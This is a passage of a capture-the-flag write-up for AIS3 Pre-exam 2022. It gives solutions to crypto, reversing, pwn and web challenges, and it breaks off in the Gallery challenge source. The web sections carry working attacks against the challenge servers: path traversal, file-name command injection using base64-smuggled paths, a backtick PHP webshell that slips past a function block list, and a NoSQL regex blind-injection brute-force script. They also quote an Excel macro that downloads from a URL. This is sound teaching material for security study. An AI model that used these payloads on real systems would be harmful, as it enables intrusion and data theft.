---
author: 王博靚 (Hyp)
instagram: https://instagram.com/Ching367436
tags: ctf
---

# AIS3 Pre-exam 2022 Write Up

Original post: https://hackmd.io/@Ching367436/AIS3_Pre-exam_2022_Write-Up

## Welcome [100 pts]

```
AIS3{WTF did I just see the FLAG before CTF starts?}
```

![](https://i.imgur.com/PIm639G.png)

## TariTari [456 pts]

### Directory traversal

The `?file` parameter of `/download.php` is a directory traversal: the value is base64-decoded and concatenated onto `./files/` without any normalisation, so encoding `../index.php` returns the application source instead of an archive.

### Retrieving `../index.php`

![](https://i.imgur.com/9UPbIwY.jpg)

```php=
<h1>Tari</h1>
<p>Tari is a service that converts your file into a .tar.gz archive.</p>
<form action="/" method="POST" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" value="Upload" />
</form>
<?php
function get_MyFirstCTF_flag() {
    // **MyFirstCTF ONLY FLAG**
    // Please IGNORE this flag if you are AIS3 Pre-Exam Player
    // Congratulations, you found the flag!
    // RCE me to get the second flag, it placed in the / directory :D
    echo 'MyFirstCTF FLAG: AIS3{../../3asy_pea5y_p4th_tr4ver5a1}';
}

function tar($file) {
    $filename = $file['name'];
    $path = bin2hex(random_bytes(16)) . ".tar.gz";
    $source = substr($file['tmp_name'], 1);
    $destination = "./files/$path";
    passthru("tar czf '$destination' --transform='s|$source|$filename|' --directory='/tmp' '/$source'", $return);
    if ($return === 0) {
        return [$path, $filename];
    }
    return [FALSE, FALSE];
}

if ($_SERVER['REQUEST_METHOD'] == 'POST') {
    $file = $_FILES['file'];
    if ($file === NULL) {
        echo "<p>No file was uploaded.</p>";
    } elseif ($file['error'] !== 0) {
        echo "<p>Error: Upload error.</p>";
    } else {
        [$path, $filename] = tar($file);
        if ($path === FALSE) {
            echo "<p>Error: Failed to create archive.</p>";
        } else {
            $path = base64_encode($path);
            $filename = urlencode($filename);
            echo "<a href=\"/download.php?file=$path&name=$filename.tar.gz\">Download</a>";
        }
    }
}
```

### Retrieving `../download.php`

```php
<?php
if ($_SERVER['REQUEST_METHOD'] == 'GET' && isset($_GET['file'])) {
    $file = base64_decode($_GET['file']);
    $path = "./files/$file";
    $name = $_GET['name'] ?? basename($file);
    if (!file_exists($path)) {
        echo "File not found";
    } else {
        header("Content-Type: application/zip");
        header("Content-Disposition: attachment; filename=$name");
        readfile($path);
        unlink($path);
    }
}
```

Note the `unlink($path)` after `readfile()`: a traversal read is also a delete whenever the web server has write permission on the target directory.

### Command injection

The `passthru()` call in `tar()` interpolates `$filename`, the user-supplied upload name, straight into a single-quoted shell argument. A `'` in the file name closes that quote, so the rest of the name is parsed as shell commands, and because `passthru()` streams the command's output, whatever those commands print comes back in the response.

`ls`

![](https://i.imgur.com/Toj2r4Z.jpg)

`ls ..`

![](https://i.imgur.com/OLqnMIZ.jpg)

`/` did not seem usable in the file name (PHP reduces an uploaded name to its basename), so it is smuggled in through an extra layer of base64:

`ls /` -> `ls $(echo Lwo= | base64 -d)`

![](https://i.imgur.com/RqxBEgJ.jpg)

`cat /y000000_i_am_the_f14GGG.txt` -> `cat $(echo L3kwMDAwMDBfaV9hbV90aGVfZjE0R0dHLnR4dAo= | base64 -d)`

![](https://i.imgur.com/Kta0eGg.jpg)

## Poking Bear [100 pts]

### Find the position of the Secret Bear

![](https://i.imgur.com/1163mF2.png)

### Set the cookie to the matching value

![](https://i.imgur.com/FU7voyw.jpg)

### Get the flag

![](https://i.imgur.com/bdIBbgw.jpg)

## SC [100 pts]

### Challenge

```python
import string
import random

def shuffle(x):
    x = list(x)
    random.shuffle(x)
    return x

def encrypt(T, file):
    with open(file) as f:
        pt = f.read()
    with open(f"{file}.enc", "w") as f:
        f.write(pt.translate(T))

charset = string.ascii_lowercase + string.ascii_uppercase + string.digits
shuffled = "".join(shuffle(charset))
T = str.maketrans(charset, shuffled)
encrypt(T, "flag.txt")
encrypt(T, __file__)

"""
Substitution cipher
From Wikipedia, the free encyclopedia
Jump to navigationJump to search
This article needs additional citations for verification. Please help improve this article by adding citations to reliable sources. Unsourced material may be challenged and removed.
Find sources: "Substitution cipher" – news · newspapers · books · scholar · JSTOR (March 2009) (Learn how and when to remove this template message)

In cryptography, a substitution cipher is a method of encrypting in which units of plaintext are replaced with the ciphertext, in a defined manner, with the help of a key; the "units" may be single letters (the most common), pairs of letters, triplets of letters, mixtures of the above, and so forth. The receiver deciphers the text by performing the inverse substitution process to extract the original message.

Substitution ciphers can be compared with transposition ciphers. In a transposition cipher, the units of the plaintext are rearranged in a different and usually quite complex order, but the units themselves are left unchanged. By contrast, in a substitution cipher, the units of the plaintext are retained in the same sequence in the ciphertext, but the units themselves are altered.

There are a number of different types of substitution cipher. If the cipher operates on single letters, it is termed a simple substitution cipher; a cipher that operates on larger groups of letters is termed polygraphic. A monoalphabetic cipher uses fixed substitution over the entire message, whereas a polyalphabetic cipher uses a number of substitutions at different positions in the message, where a unit from the plaintext is mapped to one of several possibilities in the ciphertext and vice versa.

Contents
1 Simple substitution
1.1 Security for simple substitution ciphers
2 Nomenclator
3 Homophonic substitution
4 Polyalphabetic substitution
5 Polygraphic substitution
6 Mechanical substitution ciphers
7 The one-time pad
8 Substitution in modern cryptography
9 Substitution ciphers in popular culture
10 See also
11 References
12 External links
"""
```

### Solve

The script also encrypts its own source (`encrypt(T, __file__)`), so `cipher.py` / `cipher.py.enc` is a complete known-plaintext pair for the monoalphabetic substitution. Build the inverse table from that pair and apply it to `flag.txt.enc`:

```python
with open('cipher.py') as f1, open('cipher.py.enc') as f1_enc, \
        open('flag.txt', 'w') as f2, open('flag.txt.enc') as f2_enc:
    pt1 = f1.read()
    ct1 = f1_enc.read()
    T = str.maketrans(ct1, pt1)   # ciphertext character -> plaintext character
    ct2 = f2_enc.read()
    f2.write(ct2.translate(T))
```

## Time Management [100 pts]

### The binary carries a fake flag

```shell
strings chal
```

```
AIS3{hooray_strings_is_always_an_useful_command}
```

### Solving with gdb

The program calls `sleep(0x8763)` (34659 seconds) before printing each character of the flag, so break on the `sleep` call and overwrite its argument (`rdi`) every time the breakpoint is hit.

:::spoiler
```shell
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x00005555555551a9 <+0>:     endbr64
   0x00005555555551ad <+4>:     push   rbp
   0x00005555555551ae <+5>:     mov    rbp,rsp
   0x00005555555551b1 <+8>:     sub    rsp,0x10
   0x00005555555551b5 <+12>:    mov    DWORD PTR [rbp-0xc],0x0
   0x00005555555551bc <+19>:    lea    rdi,[rip+0xeed]        # 0x5555555560b0
   0x00005555555551c3 <+26>:    call   0x555555555080 <puts@plt>
   0x00005555555551c8 <+31>:    mov    DWORD PTR [rbp-0x8],0x0
   0x00005555555551cf <+38>:    jmp    0x555555555271 <main+200>
   0x00005555555551d4 <+43>:    mov    eax,DWORD PTR [rbp-0x8]
   0x00005555555551d7 <+46>:    cdqe
   0x00005555555551d9 <+48>:    lea    rdx,[rax*4+0x0]
   0x00005555555551e1 <+56>:    lea    rax,[rip+0xe38]        # 0x555555556020 <secret>
   0x00005555555551e8 <+63>:    add    rax,rdx
   0x00005555555551eb <+66>:    mov    edx,DWORD PTR [rax]
   0x00005555555551ed <+68>:    mov    eax,DWORD PTR [rbp-0x8]
   0x00005555555551f0 <+71>:    add    eax,0x1
   0x00005555555551f3 <+74>:    cdqe
   0x00005555555551f5 <+76>:    lea    rcx,[rax*4+0x0]
   0x00005555555551fd <+84>:    lea    rax,[rip+0xe1c]        # 0x555555556020 <secret>
   0x0000555555555204 <+91>:    add    rax,rcx
   0x0000555555555207 <+94>:    mov    eax,DWORD PTR [rax]
   0x0000555555555209 <+96>:    mov    eax,eax
   0x000055555555520b <+98>:    lea    rcx,[rax*4+0x0]
   0x0000555555555213 <+106>:   lea    rax,[rip+0xe66]        # 0x555555556080 <key>
   0x000055555555521a <+113>:   mov    eax,DWORD PTR [rcx+rax*1]
   0x000055555555521d <+116>:   xor    eax,edx
   0x000055555555521f <+118>:   mov    DWORD PTR [rbp-0xc],eax
   0x0000555555555222 <+121>:   mov    DWORD PTR [rbp-0x4],0x0
   0x0000555555555229 <+128>:   jmp    0x555555555267 <main+190>
   0x000055555555522b <+130>:   mov    edi,0x8763
   0x0000555555555230 <+135>:   call   0x5555555550b0 <sleep@plt>
   0x0000555555555235 <+140>:   mov    eax,DWORD PTR [rbp-0xc]
   0x0000555555555238 <+143>:   mov    esi,eax
   0x000055555555523a <+145>:   lea    rdi,[rip+0xe9d]        # 0x5555555560de
   0x0000555555555241 <+152>:   mov    eax,0x0
   0x0000555555555246 <+157>:   call   0x555555555090 <printf@plt>
   0x000055555555524b <+162>:   mov    eax,DWORD PTR [rbp-0xc]
   0x000055555555524e <+165>:   shr    eax,0x8
   0x0000555555555251 <+168>:   mov    DWORD PTR [rbp-0xc],eax
   0x0000555555555254 <+171>:   mov    rax,QWORD PTR [rip+0x2db5]        # 0x555555558010 <stdout@@GLIBC_2.2.5>
   0x000055555555525b <+178>:   mov    rdi,rax
   0x000055555555525e <+181>:   call   0x5555555550a0 <fflush@plt>
   0x0000555555555263 <+186>:   add    DWORD PTR [rbp-0x4],0x1
   0x0000555555555267 <+190>:   cmp    DWORD PTR [rbp-0x4],0x3
   0x000055555555526b <+194>:   jle    0x55555555522b <main+130>
   0x000055555555526d <+196>:   add    DWORD PTR [rbp-0x8],0x2
   0x0000555555555271 <+200>:   cmp    DWORD PTR [rbp-0x8],0x17
   0x0000555555555275 <+204>:   jle    0x5555555551d4 <main+43>
   0x000055555555527b <+210>:   lea    rdi,[rip+0xe66]        # 0x5555555560e8
   0x0000555555555282 <+217>:   call   0x555555555080 <puts@plt>
   0x0000555555555287 <+222>:   mov    eax,0x0
   0x000055555555528c <+227>:   leave
   0x000055555555528d <+228>:   ret
End of assembler dump.
(gdb) break *main+135
Breakpoint 1 at 0x555555555230
(gdb) run
Starting program: /home/c/Downloads/chal
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Hope you have enough time to receive my flag:

Breakpoint 1, 0x0000555555555230 in main ()
(gdb) info registers
rax            0x33534941          861096257
rbx            0x0                 0
rcx            0x4                 4
rdx            0x33534941          861096257
rsi            0x1                 1
rdi            0x8763              34659
rbp            0x7fffffffdf70      0x7fffffffdf70
rsp            0x7fffffffdf60      0x7fffffffdf60
r8             0x0                 0
r9             0x5555555592a0      93824992252576
r10            0x77                119
r11            0x246               582
r12            0x7fffffffe088      140737488347272
r13            0x5555555551a9      93824992235945
r14            0x0                 0
r15            0x7ffff7ffd040      140737354125376
rip            0x555555555230      0x555555555230 <main+135>
eflags         0x293               [ CF AF SF IF ]
cs             0x33                51
ss             0x2b                43
ds             0x0                 0
es             0x0                 0
fs             0x0                 0
gs             0x0                 0
(gdb) set $rdi=1
# (omitted) ...
Breakpoint 1, 0x0000555555555230 in main ()
(gdb) set $rdi=0
(gdb) c
Continuing.
S
Breakpoint 1, 0x0000555555555230 in main ()
(gdb) set $rdi=1
(gdb) c
Continuing.
3
Breakpoint 1, 0x0000555555555230 in main ()
(gdb) set $rdi=1
(gdb) c
Continuing.
{
Breakpoint 1, 0x0000555555555230 in main ()
(gdb) set $rdi=1
(gdb) c
Continuing.
Y
# (omitted) ...
Breakpoint 1, 0x0000555555555230 in main ()
(gdb) set $rdi=1
(gdb) c
Continuing.
!
Breakpoint 1, 0x0000555555555230 in main ()
(gdb) set $rdi=1
(gdb) c
Continuing.
Oops! Where is the flag? I am sure that the flag is already printed!
[Inferior 1 (process 2555) exited normally]
(gdb)
```
:::

```
AIS3{You_are_the_master_of_time_management!!!!!}
```

## Simple File Uploader [100 pts]

### Challenge

:::spoiler
```php=
<?php
if(isset($_FILES['file'])) {
    $file_name = basename($_FILES['file']['name']);
    $file_tmp = $_FILES['file']['tmp_name'];
    $file_type = $_FILES['file']['type'];
    $file_ext = pathinfo($file_name, PATHINFO_EXTENSION);

    if(in_array($file_ext, ['php', 'php2', 'php3', 'php4', 'php5', 'php6', 'phtml', 'pht'])) {
        die('p...php ?? (((゚Д゚;)))');
    }

    $box = md5(session_start().session_id());
    $dir = './uploads/' . $box . '/';
    if (!file_exists($dir)) {
        mkdir($dir);
    }

    $is_bad = false;
    $file_content = file_get_contents($file_tmp);
    $data = strtolower($file_content);
    if (strpos($data, 'system') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'exec') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'passthru') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'show_source') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'proc_open') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'popen') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'pcntl_exec') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'eval') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'assert') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'die') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'shell_exec') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'create_function') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'call_user_func') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'preg_replace') !== false) {
        $is_bad = true;
    } else if (strpos($data, 'scandir') !== false) {
        $is_bad = true;
    }

    if($is_bad) {
        die('You are bad ヽ(#`Д´)ノ');
    }

    $new_filename = md5(time()).'.'.$file_ext;
    move_uploaded_file($file_tmp, $dir.$new_filename);
    echo '
    <!DOCTYPE html>
    <html lang="en">
    <head>
        <meta charset="utf-8">
        <meta name="viewport" content="width=device-width, initial-scale=1">
        <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bulma@0.9.4/css/bulma.min.css">
        <title>Simple File Uploader</title>
    </head>
    <body>
        <div class="container is-vcentered is-centered" style="max-width: 60%; padding-top: 10%;">
            <article class="message">
                <div class="message-header">
                    <p>Upload Success!</p>
                    <button class="delete" aria-label="delete"></button>
                </div>
                <div class="message-body">
                    Upload /uploads/'. $box . '/' . $new_filename .'
                </div>
            </article>
        </div>
    <body>
    </html>
    ';
} else if (isset($_GET['src'])) {
    show_source("index.php");
} else {
    echo file_get_contents('home.html');
}
?>
```
:::

### Bypass the extension filter

The `in_array()` check compares the extension case-sensitively against a lowercase list, so `.pHp` is not blocked, and the server still executes the upload as PHP.

### Bypass the function filter

The content filter (the `strpos()` chain) only looks for a fixed list of lowercase substrings. The backtick operator (`` ` ``, `\x60`) runs a shell command just like `shell_exec()` but contains none of the banned words, so a webshell can be built from it:

https://sushant747.gitbooks.io/total-oscp-guide/content/webshell.html

```php
<?php echo `whoami`; ?>
```

```
www-data
```

### `ls /`

```php
<?php echo `ls /`; ?>
```

```
bin
boot
das_ist_die_fL4g.txt
dev
etc
home
lib
lib64
media
mnt
opt
proc
rUn_M3_t0_9et_fL4g
root
run
sbin
srv
sys
tmp
usr
var
```

### `cat das_ist_die_fL4g.txt`

```php
<?php echo `cat das_ist_die_fL4g.txt`; ?>
```

```
You are bad ヽ(#`Д´)ノ
```

This is rejected by the content filter, not by the shell: the file name itself contains `die`, one of the filtered substrings, so the upload never reaches the server's disk.

### `/rUn_M3_t0_9et_fL4g`

```php
<?php echo `/rUn_M3_t0_9et_fL4g`; ?>
```

```
AIS3{H3yyyyyyyy_U_g0t_mi٩(ˊᗜˋ*)و}
```

## knock [356 pts]

Someone is knocking on the door:

![](https://i.imgur.com/5Iq1CCM.jpg)

The knocked ports look like `AIS3{...}`: each port is 12000 plus an ASCII code (12065 -> `A`, 12073 -> `I`, 12083 -> `S`, 12051 -> `3`, 12123 -> `{`).

```
12065 12073 12083 12051 12123 12107 12110 12048 12099 12107 12075 12078 12079 12067 12075 12107 12110 12111 12099 12107 12125
```

```
AIS3{kn0ckKNOCKknock}
```

## Excel [100 pts]

Decode the first argument of the formula in `isFki.A58` (a concatenation of scattered cells; the result lands in A68).

![](https://i.imgur.com/X5IwNZq.jpg)

`isFki.A58`

```javascript
=FORMULA($mqLen.D14&$Mment.BA10&$coCGA.S17&$coCGA.Q19&$KRnsl.L19&$Mment.F3&$coCGA.G26&$coCGA.O23&$coCGA.P3&$coCGA.K12&$KRnsl.J19&$KRnsl.C11&$coCGA.N3&$mqLen.E4&$coCGA.D11&$KRnsl.T5&$JVHco.K10&$mqLen.BA14&$Mment.W1&$KRnsl.U13&$KRnsl.V9&$mqLen.C12&$KRnsl.J4&$Mment.Y19&$mqLen.K19&$JVHco.F2&$mqLen.K10&$coCGA.Z15&$mqLen.N21&$Mment.N1&$Mment.S2&$coCGA.X2&$Mment.D16&$coCGA.U26&$coCGA.R1&$mqLen.V9&$mqLen.R11&$Mment.X1&$coCGA.D5&$KRnsl.Z19&$mqLen.BA4&$coCGA.Z9&$coCGA.G7&$mqLen.U10&$Mment.U11&$coCGA.G18&$JVHco.V1&$mqLen.O26&$Mment.G5&$KRnsl.H22&$Mment.P10&$JVHco.W17&$Mment.F8&$coCGA.L15&$coCGA.H3&$KRnsl.U17&$KRnsl.BA11&$coCGA.X12&$KRnsl.F14&$Mment.B10&$KRnsl.V12&$Mment.U12&$coCGA.P14&$coCGA.Y1&$JVHco.B10&$JVHco.F16&$KRnsl.Q26&$Mment.P25&$KRnsl.M3&$KRnsl.I26&$mqLen.L15&$mqLen.V25&$KRnsl.G2&$Mment.I18&$Mment.M4&$KRnsl.C7&$JVHco.N5&$KRnsl.M19&$Mment.J9&$Mment.I7&$coCGA.G13&$KRnsl.M12&$mqLen.X2&$mqLen.M1&$JVHco.P3&$KRnsl.S12&$Mment.U10&$JVHco.D16&$mqLen.P17&$KRnsl.I5&$coCGA.W24&$JVHco.E10&$Mment.B8&$coCGA.C14&$JVHco.Z15&$Mment.BA11&$coCGA.F19&$KRnsl.Z2&$JVHco.D13&$Mment.O2&$KRnsl.D19&$Mment.K19&$Mment.U20&$JVHco.Q9&$KRnsl.I17&$coCGA.X17&$JVHco.Q24&$KRnsl.Q4&$coCGA.N21&$coCGA.W11&$JVHco.E17&$mqLen.H19&$KRnsl.X6&$coCGA.N26&$coCGA.N18&$KRnsl.Q17&$JVHco.J25&$KRnsl.Z16&$mqLen.P13&$coCGA.Z21&$JVHco.C24&$Mment.X19&$Mment.O21, A137)
```

The decoded formula is an Excel 4.0 (XLM) macro that downloads a URL, and the flag is in that URL:

```javascript
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://ais3.org/?AIS3{XLM_iS_to0_o1d_but_co0o0o00olll!!}",".\~tmp.txt",0,0)
```

## Fast Cipher [100 pts]

### Challenge

```python
from secrets import randbelow

M = 2**1024

def f(x):
    # this is a *fast* function
    return (
        4 * x**4 +
        8 * x**8 +
        7 * x**7 +
        6 * x**6 +
        3 * x**3 +
        0x48763
    ) % M

def encrypt(pt, key):
    ct = []
    for c in pt:
        ct.append(c ^ (key & 0xFF))
        key = f(key)
    return bytes(ct)

if __name__ == "__main__":
    key = randbelow(M)
    ct = encrypt(open("flag.txt", "rb").read().strip(), key)
    print(ct.hex())
```

### Known-plaintext attack

Only the low byte of the key ever reaches the keystream, and because `f` is a polynomial with integer coefficients (and 256 divides `M`), `f(key) mod 256` depends only on `key mod 256`. Recovering that single byte from the known prefix `AIS3{` is therefore enough to regenerate the whole keystream:

```python
M = 2**1024

def f(x):
    # this is a *fast* function
    return (
        4 * x**4 +
        8 * x**8 +
        7 * x**7 +
        6 * x**6 +
        3 * x**3 +
        0x48763
    ) % M

output_file = open('output.txt')
ct = bytearray.fromhex(output_file.read().strip())

# the flag starts with AIS3
pt_head = bytearray("AIS3{".encode())
key = pt_head[0] ^ ct[0]   # low byte of the real key; all that matters mod 256

def decrypt(ct, key):
    pt = []
    for c in ct:
        pt.append(c ^ (key & 0xFF))
        key = f(key)
    return bytes(pt)

def main():
    pt = decrypt(ct, key)
    print(pt)

if __name__ == '__main__':
    main()
```

```
AIS3{not_every_bits_are_used_lol}
```

## SAAS - Crash [40 pts]

### Challenge

> This challenge is not about Software as a Service, but String as a Service.
>> You only need to crash the program at remote to get this flag, no need to actually write exploit for it

:::spoiler
```cpp
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

class String {
public:
    char *str;
    size_t len;

    String(const char *s) {
        len = strlen(s);
        str = new char[len + 1];
        strcpy(str, s);
    }

    ~String() {
        delete[] str;
    }
};

const int MAX_STRS = 16;
char tmp[4096];
String *strs[MAX_STRS] = {};

int readidx() {
    char c;
    int idx;
    printf("Index: ");
    scanf("%d%c", &idx, &c);
    if (idx < 0 || idx >= MAX_STRS) {
        printf("Bad index\n");
        exit(0);
    }
    return idx;
}

void print(String s) {
    printf("Length: %zu\n", s.len);
    printf("Content: ");
    write(1, s.str, s.len);
    printf("\n");
}

void menu() {
    printf("===== S(tring)AAS =====\n");
    printf("1. Create string\n");
    printf("2. Edit string\n");
    printf("3. Print string\n");
    printf("4. Delete string\n");
}

int main() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    while (true) {
        int choice, idx;
        char c;
        menu();
        printf("> ");
        scanf("%d", &choice);
        switch (choice) {
        case 1:
            idx = readidx();
            printf("Content: ");
            scanf("%4095[^\n]", tmp);
            scanf("%c", &c);
            strs[idx] = new String(tmp);
            break;
        case 2:
            idx = readidx();
            printf("New Content: ");
            if (strs[idx] != nullptr) {
                scanf("%4095[^\n]", tmp);
                scanf("%c", &c);
                memcpy(strs[idx]->str, tmp, strs[idx]->len);
                strs[idx]->str[strs[idx]->len] = 0;
            } else {
                printf("String #%d doesn't exist!\n", idx);
            }
            break;
        case 3:
            idx = readidx();
            if (strs[idx] != nullptr) {
                print(*strs[idx]);
            } else {
                printf("String #%d doesn't exist!\n", idx);
            }
            break;
        case 4:
            idx = readidx();
            if (strs[idx] != nullptr) {
                delete strs[idx];
                strs[idx] = nullptr;
            } else {
                printf("String #%d doesn't exist!\n", idx);
            }
            break;
        default:
            puts("Bad option");
            exit(0);
        }
    }
    return 0;
}
```
:::

### Solve

The crash is not caused by the edit handler: option 2 copies only `strs[idx]->len` bytes, so the long input in the transcript never overflows anything. The bug is in `print(String s)`, which takes its argument by value. `String` defines a destructor but no copy constructor, so the compiler-generated copy shares the `str` pointer, and when the temporary is destroyed at the end of `print()` it `delete[]`s the buffer that `strs[idx]` still owns. Printing a string and then deleting it therefore frees the same allocation twice; the edit step below is unnecessary.

:::spoiler
```shell
ch@CHSMB chall % ./a.out
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 1
Index: 1
Content: t
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 2
Index: 1
New Content: ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 3
Index: 1
Length: 1
Content: t
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 4
Index: 1
a.out(15050,0x11479e600) malloc: *** error for object 0x6000031a0010: pointer being freed was not allocated
a.out(15050,0x11479e600) malloc: *** set a breakpoint in malloc_error_break to debug
zsh: abort      ./a.out
```
:::

```
ch@CHSMB chall % nc chals1.ais3.org 6008
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 1
Index: 1
Content: t
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 2
Index: 1
New Content: ttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttt
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 3
Index: 1
Length: 1
Content: t
===== S(tring)AAS =====
1. Create string
2. Edit string
3. Print string
4. Delete string
> 4
Index: 1
free(): double free detected in tcache 2
timeout: the monitored command dumped core
Aborted
AIS3{congrats_on_crashing_my_editor!_but_can_you_get_shell_from_it?}
ch@CHSMB chall %
```

## The Best Login UI [432 pts]

### Challenge

```javascript=
const express = require('express');
const bodyParser = require('body-parser');

const app = express();
app.use(bodyParser.urlencoded({ extended: true }));

const PORT = process.env.PORT || 3000;
const mongo = {
  host: process.env.MONGO_HOST || 'localhost',
  db: process.env.MONGO_DB || 'loginui',
};

app.get('/', (_, res) => {
  res.sendFile(__dirname + '/index.html');
});

app.post('/login', async (req, res) => {
  const db = app.get('db');
  const { username, password } = req.body;
  const user = await db.collection('users').findOne({ username, password });
  if (user) {
    res.send('Success owo!');
  } else {
    res.send('Failed qwq');
  }
});

const MongoClient = require('mongodb').MongoClient;
MongoClient.connect(mongo.host, (err, client) => {
  if (err) throw err;
  app.set('db', client.db(mongo.db));
  app.listen(PORT, () => console.log(`Listening on port ${PORT}`));
});
```

### `src/app.js:5`: `bodyParser.urlencoded({ extended: true })`

With `extended: true` the body is parsed by `qs`, which turns bracketed keys into nested objects (https://www.npmjs.com/package/qs#parsing-objects):

> qs allows you to create nested objects within your query strings, by surrounding the name of sub-keys with square brackets []. For example, the string 'foo[bar]=baz' converts to:
>
> foo: { bar: 'baz' }

So a body field `password[$regex]=...` arrives as `{ password: { $regex: '...' } }`.

### Using MongoDB's `$regex`

Line 20, `findOne({ username, password })`, passes the request object into the query unchanged, so the nested object becomes a MongoDB operator and the password check turns into a regex match we control. (The fix is to reject or stringify non-string fields before they reach the query.)

```url
username=admin&password[$regex]=AIS3{.+
```

![](https://i.imgur.com/w7Fc0aB.jpg)

### Getting the length

`password[$regex]`

```url
^AIS3\{.{36}$
```

```html
Success owo!
```

### Confirming the flag is printable ASCII

`password[$regex]`

```url
^AIS3\{[ -~]{35}\}$
```

```html
Success owo!
```

### Binary search

Each character is found by asking whether it falls in the class `[l-m]` and halving the range; `chr2` escapes characters that are special in a PCRE pattern so they can be used both inside the class and when appended to the known prefix.

```python
import requests

URL = 'http://chals1.ais3.org:54088/login'
data = {
    "username": "admin",
    "password[$regex]": r'''^AIS3\{[ -~]{35}\}$'''
}
flag_pattern = r'''^AIS3\{Bl1nd-b4s3d r3gex n0sq1i\?\! \(:3\['''

def check(data) -> bool:
    r = requests.post(URL, data=data)
    return "owo" in r.text

def chr2(a):
    # escape anything special in a PCRE pattern, inside or outside a character class;
    # '^' in particular must not slip through unescaped ('[^-m]' would negate the class)
    c = chr(a)
    return '\\' + c if c in r'\^$.|?*+()[]{}-!' else c

def find_one():
    global flag_pattern
    l = ord(' ')
    r = ord('~')
    while l < r:   # binary search over the printable range with [l-m] classes
        m = (l + r) // 2
        data["password[$regex]"] = f'{flag_pattern}[{chr2(l)}-{chr2(m)}]'
        print(data["password[$regex]"])
        if check(data):
            r = m
        else:
            l = m + 1
    print(l)
    flag_pattern += chr2(l)

def main():
    while flag_pattern[-1] != '}':
        find_one()
        print(flag_pattern)

if __name__ == '__main__':
    main()
```

```
^AIS3\{Bl1nd-b4s3d r3gex n0sq1i\?\! \(:3\[___\]}
```

```javascript
AIS3{Bl1nd-b4s3d r3gex n0sq1i?! (:3[___]}
```

## Gallery [500 pts]

<!-- https://stackoverflow.com/questions/1797203/how-to-load-an-external-javascript-script-to-pure-svg-document -->
<!-- https://stackoverflow.com/questions/35192841/how-do-i-post-with-multipart-form-data-using-fetch -->

### Challenge

> This is a front-end security challenge; you need to use the Report feature to send a URL for the admin to browse, and steal the FLAG the admin owns that way.

:::spoiler
```python=
from flask import Flask, render_template, request, redirect, url_for, g, session, send_file
import sqlite3
import secrets
import os
import uuid
import mimetypes
import pathlib
from rq import Queue
from redis import Redis

app = Flask(__name__)
app.queue = Queue(connection=Redis('xss-bot'))
app.config.update({
    'SECRET_KEY': secrets.token_bytes(16),
    'UPLOAD_FOLDER': '/data/uploads',
    'MAX_CONTENT_LENGTH': 32 * 1024 * 1024,  # 32MB
})
IMAGE_EXTENSIONS = [ext for ext, type in mimetypes.types_map.items() if type.startswith('image/')]
ADMIN_PASSWORD = os.getenv('ADMIN_PASSWORD', 'admin')
